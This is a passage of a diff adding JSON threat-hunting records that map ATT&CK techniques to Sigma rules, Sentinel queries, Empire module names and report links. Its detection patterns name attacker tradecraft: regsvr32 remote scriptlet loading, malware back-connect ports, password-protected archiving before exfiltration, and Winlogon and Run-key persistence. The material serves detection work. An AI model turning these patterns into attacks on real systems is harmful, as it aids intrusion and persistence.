"Unlikely" + ], + "level": "critical" + }, + { + "title": "Regsvr32 Anomaly", + "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "status": "experimental", + "description": "Detects various anomalies in relation to regsvr32.exe", + "author": "Florian Roth", + "references": [ + "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html" + ], + "tags": [ + "attack.t1117", + "attack.defense_evasion", + "attack.execution", + "car.2019-04-002", + "car.2019-04-003" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "Image": 
"*\\regsvr32.exe", + "CommandLine": "*\\Temp\\\\*" + }, + "selection2": { + "Image": "*\\regsvr32.exe", + "ParentImage": "*\\powershell.exe" + }, + "selection3": { + "Image": "*\\regsvr32.exe", + "CommandLine": [ + "*/i:http* scrobj.dll", + "*/i:ftp* scrobj.dll" + ] + }, + "selection4": { + "Image": "*\\wscript.exe", + "ParentImage": "*\\regsvr32.exe" + }, + "selection5": { + "Image": "*\\EXCEL.EXE", + "CommandLine": "*..\\..\\..\\Windows\\System32\\regsvr32.exe *" + }, + "condition": "1 of them" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "ID - 7", + "Sysmon", + "Loaded DLLs" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "Sysmon - ID 7", + "Loaded DLLs" + ], + [ + "4657", + "Windows Registry" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ] + }, + { + "technique_id": "T1043", + "command_list": [ + "!=powershell.exe", + "nslookup", + "!=cmd.exe", + "powershell/lateral_movement/invoke_sshcommand" + ], + "commands": [ + { + "command": "!=powershell.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, 
+ { + "command": "nslookup", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "!=cmd.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powershell/lateral_movement/invoke_sshcommand", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "chain_id": "100051", + "os": "windows", + "parent_process": "!=powershell.exe", + "commandline_string": "", + "sub_process_1": "nslookup", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "commonly_used_port", + "mitre_attack": "T1043", + "itw_sample": "" + }, + { + "chain_id": "100052", + "os": "windows", + "parent_process": "!=cmd.exe", + "commandline_string": "", + "sub_process_1": "nslookup", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "commonly_used_port", + "mitre_attack": "T1043", + "itw_sample": "" + }, + { + "Empire Module": "powershell/lateral_movement/invoke_sshcommand", + "ATT&CK Technique #1": "T1043", + "ATT&CK Technique #2": "", + "Technique": "Commonly Used Port", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_sshcommand\": [\"T1043\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Possible DNS Tunneling", + "id": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", + "status": "experimental", + "description": "Normally, DNS logs contain a limited amount of different dns queries for a single domain. 
This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.", + "references": [ + "https://zeltser.com/c2-dns-tunneling/", + "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/" + ], + "author": "Patrick Bareiss", + "date": "2019/04/07", + "logsource": { + "product": "dns" + }, + "detection": { + "selection": { + "parent_domain": "*" + }, + "condition": "selection | count(dns_query) by parent_domain > 1000" + }, + "falsepositives": [ + "Valid software, which uses dns for transferring data" + ], + "level": "high", + "tags": [ + "attack.t1043" + ] + }, + { + "title": "Suspicious Typical Malware Back Connect Ports", + "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "status": "experimental", + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "references": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo" + ], + "author": "Florian Roth", + "date": "2017/03/19", + "tags": [ + "attack.command_and_control", + "attack.t1043" + ], + "logsource": { + "product": "windows", + "service": "sysmon", + "definition": "Use the following config to generate the necessary Event ID 10 Process Access events: VBE7.DLLUNKNOWN" + }, + "detection": { + "selection": { + "EventID": 3, + "Initiated": "true", + "DestinationPort": [ + "4443", + "2448", + "8143", + "1777", + "1443", + "243", + "65535", + "13506", + "3360", + "200", + "198", + "49180", + "13507", + "6625", + "4444", + "4438", + "1904", + "13505", + "13504", + "12102", + "9631", + "5445", + "2443", + "777", + "13394", + "13145", + "12103", + "5552", + "3939", + "3675", + "666", + "473", + "5649", + "4455", + "4433", + "1817", + "100", + "65520", + "1960", + "1515", + "743", + "700", + "14154", + "14103", + "14102", + "12322", + "10101", + "7210", + "4040", + "9943" + ] + }, + "filter1": { + "Image": 
"*\\Program Files*" + }, + "filter2": { + "DestinationIp": [ + "10.*", + "192.168.*", + "172.16.*", + "172.17.*", + "172.18.*", + "172.19.*", + "172.20.*", + "172.21.*", + "172.22.*", + "172.23.*", + "172.24.*", + "172.25.*", + "172.26.*", + "172.27.*", + "172.28.*", + "172.29.*", + "172.30.*", + "172.31.*", + "127.*" + ], + "DestinationIsIpv6": "false" + }, + "condition": "selection and not ( filter1 or filter2 )" + }, + "falsepositives": [ + "unknown" + ], + "level": "medium" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf", + 
"https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://securelist.com/operation-daybreak/75100/", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + "https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", NaN + ] + }, + { + "technique_id": "T1002", + "command_list": [ + "rar.exe", + "powershell/management/zipfolder" + ], + "commands": [ + { + "command": "rar.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powershell/management/zipfolder", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "chain_id": "100067", + "os": "windows", + "parent_process": "rar.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "data_compressed", + "mitre_attack": "T1002", + "itw_sample": "" + }, + { + "Empire Module": "powershell/management/zipfolder", + 
"ATT&CK Technique #1": "T1002", + "ATT&CK Technique #2": "", + "Technique": "Data Compressed", + "Concatenate for Python Dictionary": "\"powershell/management/zipfolder\": [\"T1002\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"powershell.exe\"and process_command_line contains \"-Recurse | Compress-Archive\")or (process_path contains \"rar.exe\"and process_command_line contains \"rar*a*\")", + "name": "Data Compressed" + } + ], + "possible_detections": [ + { + "title": "Judgement Panda Exfil Activity", + "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", + "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike", + "references": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/" + ], + "author": "Florian Roth", + "date": "2019/02/21", + "tags": [ + "attack.lateral_movement", + "attack.g0010", + "attack.credential_access", + "attack.t1098", + "attack.exfiltration", + "attack.t1002" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": [ + "*\\ldifde.exe -f -n *", + "*\\7za.exe a 1.7z *", + "* eprod.ldf", + "*\\aaaa\\procdump64.exe*", + "*\\aaaa\\netsess.exe*", + "*\\aaaa\\7za.exe*", + "*copy .\\1.7z \\\\*", + "*copy \\\\client\\c$\\aaaa\\\\*" + ] + }, + "selection2": { + "Image": "C:\\Users\\Public\\7za.exe" + }, + "condition": "selection1 or selection2" + }, + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "title": "Data Compressed", + "id": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", + "status": "experimental", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": 
"2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml" + ], + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + "selection1": { + "type": "execve", + "a0": "zip" + }, + "selection2": { + "type": "execve", + "a0": "gzip", + "a1": "-f" + }, + "selection3": { + "type": "execve", + "a0": "tar", + "a1|contains": "-c" + }, + "condition": "1 of them" + }, + "falsepositives": [ + "Legitimate use of archiving tools by legitimate user" + ], + "level": "low", + "tags": [ + "attack.exfiltration", + "attack.t1002" + ] + }, + { + "title": "Data Compressed", + "id": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "status": "experimental", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml" + ], + "logsource": { + "product": "windows", + "service": "powershell", + "description": "Script block logging must be enabled" + }, + "detection": { + "selection": { + "EventID": 4104, + "keywords|contains|all": [ + "-Recurse", + "|", + "Compress-Archive" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "highly likely if archive ops are done via PS" + ], + "level": "low", + "tags": [ + "attack.exfiltration", + "attack.t1002" + ] + }, + { + "title": "Data Compressed", + "id": "6f3e2987-db24-4c78-a860-b4f4095a7095", + "status": "experimental", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": 
"2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\rar.exe", + "CommandLine|contains|all": [ + " a ", + "-r" + ] + }, + "condition": "selection" + }, + "fields": [ + "Image", + "CommandLine", + "User", + "LogonGuid", + "Hashes", + "ParentProcessGuid", + "ParentCommandLine" + ], + "falsepositives": [ + "highly likely if rar is default archiver in the monitored environment" + ], + "level": "low", + "tags": [ + "attack.exfiltration", + "attack.t1002" + ] + }, + { + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", + "status": "experimental", + "description": "Detects suspicious command line arguments of common data compression tools", + "references": [ + "https://twitter.com/SBousseaden/status/1184067445612535811" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020", + "attack.t1002" + ], + "author": "Florian Roth, Samir Bousseaden", + "date": "2019/10/15", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "OriginalFileName": [ + "7z*.exe", + "*rar.exe", + "*Command*Line*RAR*" + ], + "CommandLine": [ + "* -p*", + "* -ta*", + "* -tb*", + "* -sdel*", + "* -dw*", + "* -hp*" + ] + }, + "falsepositive": { + "ParentImage": "C:\\Program*" + }, + "condition": "selection and not falsepositive" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File Monitoring" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "IDS/IPS" + ], + [ + "DLP" + ], + [ + "Binary file metadata" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File Monitoring" + ], + [ + "5156", + "Windows Firewall" + ], + [ + 
"IDS/IPS" + ], + [ + "DLP" + ], + [ + "LOG-MD B9", + "Binary file metadata" + ] + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www.justice.gov/file/1080281/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + 
"https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ] + }, + { + "technique_id": "T1031", + "command_list": [ + "sc.exe" + ], + "commands": [ + { + "command": "sc.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + } + ], + "parsed_datasets": [ + { + "chain_id": "100073", + "os": "windows", + "parent_process": "sc.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "sc", + "mitre_attack": "T1031", + "itw_sample": "" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"sc.exe\"or process_path contains \"powershell.exe\"or process_path contains \"cmd.exe\")and process_command_line contains \"*sc*config*binpath*\"", + "name": "Modify Existing Service" + } + ], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "7040", + "Service Change" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "7040/7045", + "Service Change" + ] + ], + "external_reference": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ] + }, + { + "technique_id": "T1004", + "command_list": [ + "winlogon.exe", + "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify|\\Microsoft\\Windows 
NT\\CurrentVersion\\Winlogon\\Userinit|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" + ], + "commands": [ + { + "command": "winlogon.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell", + "source": "SysmonHunter - Winlogon Helper DLL", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100087", + "os": "windows", + "parent_process": "winlogon.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "winlogon", + "mitre_attack": "T1004", + "itw_sample": "" + }, + { + "name": "Winlogon Helper DLL", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14) and(registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\user_nameinit\\\\\"or registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\\"or registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\\")", + "name": "Win Logon Helper DLL" + } + ], + "possible_detections": [ + { + "title": "Winlogon Helper DLL", + "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "status": "experimental", + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1004/T1004.yaml" + ], + "logsource": { + "product": "windows", + "service": "powershell", + "description": "Script block logging must be enabled" + }, + "detection": { + "selection": { + "EventID": 4104 + }, + "keyword1": [ + "*Set-ItemProperty*", + "*New-Item*" + ], + "keyword2": [ + "*CurrentVersion\\Winlogon*" + ], + "condition": "selection and ( keyword1 and keyword2 )" + }, + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "tags": [ + "attack.persistence", + "attack.t1004" + ] + }, + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD", + "Hash Compare" + ], + [ + "AutoRuns" + ], + [ + "4688", + "Process Execution" + ], + [ + "LOG-MD", + "AutoRuns" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD", + "Hash Compare" + ] + ], + "external_reference": [ + 
"https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" + ] + }, + { + "technique_id": "T1050", + "command_list": [ + "*.exe (query|add)", + "\\AppData\\*", + "HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "$Recycle.bin\\*", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "Temp\\*", + "Users\\Public\\*", + "Users\\Default\\*", + "HKEY_USERS\\*\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand", + "powershell/privesc/powerup/service_exe_restore", + "powershell/privesc/powerup/service_exe_stager", + "powershell/privesc/powerup/service_exe_useradd", + "powershell/privesc/powerup/service_stager" + ], + "commands": [ + { + "command": "*.exe (query|add)", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "\\AppData\\*", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "$Recycle.bin\\*", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "Temp\\*", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "Users\\Public\\*", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "Users\\Default\\*", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "HKEY_USERS\\*\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "powershell/privesc/powerup/service_exe_restore", + "source": 
"https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/powerup/service_exe_stager", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/powerup/service_exe_useradd", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/powerup/service_stager", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "chain_id": "100109", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "(query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "registry_value": "", + "file_path": "\\AppData\\*", + "file_value": "", + "frequency": "high", + "mitre_caption": "new_service", + "mitre_attack": "T1050", + "itw_sample": "" + }, + { + "chain_id": "100110", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "(query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "registry_value": "", + "file_path": "$Recycle.bin\\*", + "file_value": "", + "frequency": "rare", + "mitre_caption": "new_service", + "mitre_attack": "T1050", + "itw_sample": "" + }, + { + "chain_id": "100111", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "(query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "registry_value": "", + "file_path": "Temp\\*", + "file_value": "", + "frequency": 
"high", + "mitre_caption": "new_service", + "mitre_attack": "T1050", + "itw_sample": "" + }, + { + "chain_id": "100112", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "(query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "registry_value": "", + "file_path": "Users\\Public\\*", + "file_value": "", + "frequency": "high", + "mitre_caption": "new_service", + "mitre_attack": "T1050", + "itw_sample": "" + }, + { + "chain_id": "100113", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "(query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "registry_value": "", + "file_path": "Users\\Default\\*", + "file_value": "", + "frequency": "high", + "mitre_caption": "new_service", + "mitre_attack": "T1050", + "itw_sample": "" + }, + { + "chain_id": "100114", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "(query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKEY_USERS\\*\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "new_service", + "mitre_attack": "T1050", + "itw_sample": "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe" + }, + { + "Empire Module": "powershell/privesc/powerup/service_exe_restore", + "ATT&CK Technique #1": "T1050", + "ATT&CK Technique #2": "", + "Technique": "New Service", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/service_exe_restore\": [\"T1050\"]," + }, + { + "Empire Module": "powershell/privesc/powerup/service_exe_stager", + "ATT&CK Technique #1": "T1050", + "ATT&CK Technique #2": "", + "Technique": "New Service", + "Concatenate for Python Dictionary": 
"\"powershell/privesc/powerup/service_exe_stager\": [\"T1050\"]," + }, + { + "Empire Module": "powershell/privesc/powerup/service_exe_useradd", + "ATT&CK Technique #1": "T1050", + "ATT&CK Technique #2": "", + "Technique": "New Service", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/service_exe_useradd\": [\"T1050\"]," + }, + { + "Empire Module": "powershell/privesc/powerup/service_stager", + "ATT&CK Technique #1": "T1050", + "ATT&CK Technique #2": "", + "Technique": "New Service", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/service_stager\": [\"T1050\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"sc.exe\"or process_path contains \"powershell.exe\"or process_path contains \"cmd.exe\")and (process_command_line contains \"*New-Service*BinaryPathName*\"or process_command_line contains \"*sc*create*binpath*\"or process_command_line contains \"*Get-WmiObject*Win32_Service*create*\")", + "name": "New Service Process" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "APT29 Google Update Service Install", + "id": "c069f460-2b87-4010-8dcf-e45bab362624", + "description": "This method detects malicious services mentioned in APT29 report by FireEye. 
